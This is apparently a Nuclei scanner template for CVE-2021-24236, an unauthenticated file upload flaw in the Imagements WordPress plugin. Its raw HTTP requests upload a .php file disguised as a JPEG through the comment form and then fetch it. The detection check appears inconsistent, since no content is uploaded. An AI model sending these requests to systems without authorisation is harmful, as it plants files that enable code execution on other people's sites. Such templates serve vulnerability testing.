id: CVE-2021-24236

info:
  name: WordPress Plugin Imagements 1.2.5 - Unauthenticated Arbitrary File Upload
  author: pussycat0x
  severity: critical
  description: |
    The Imagements WordPress plugin through 1.2.5 allows images to be uploaded in comments, but only checks the Content-Type of the request to reject dangerous files. This allows unauthenticated attackers to upload arbitrary files by using a valid image Content-Type along with a PHP filename and code, leading to RCE.
  reference:
    - https://wpscan.com/vulnerability/8f24e74f-60e3-4100-9ab2-ec31b9c9cdea
    - https://wordpress.org/plugins/imagements/
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24236
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24236
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-24236
    cwe-id: CWE-434
  tags: cve,rce,wp,unauth,imagements,wpscan,cve2021,fileupload,wordpress,wp-plugin,intrusive

variables:
  php: "{{to_lower('{{randstr}}')}}.php"
  post: "1"

requests:
  - raw:
      - |
        POST /wp-comments-post.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIYl2Oz8ptq5OMtbU

        ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
        Content-Disposition: form-data; name="comment"

        {{randstr}}
        ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
        Content-Disposition: form-data; name="author"

        {{randstr}}
        ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
        Content-Disposition: form-data; name="email"

        {{randstr}}@email.com
        ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
        Content-Disposition: form-data; name="url"

        ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
        Content-Disposition: form-data; name="checkbox"

        yes
        ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
        Content-Disposition: form-data; name="naam"

        {{randstr}}
        ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
        Content-Disposition: form-data; name="image"; filename="{{php}}"
        Content-Type: image/jpeg

        ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
        Content-Disposition: form-data; name="submit"

        Post Comment
        ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
        Content-Disposition: form-data; name="comment_post_ID"

        {{post}}
        ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
        Content-Disposition: form-data; name="comment_parent"

        0
        ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU--

      - |
        GET /wp-content/plugins/imagements/images/{{php}} HTTP/1.1
        Host: {{Hostname}}

    req-condition: true
    matchers:
      - type: word
        part: body_2
        words:
          - "CVE-2021-24236"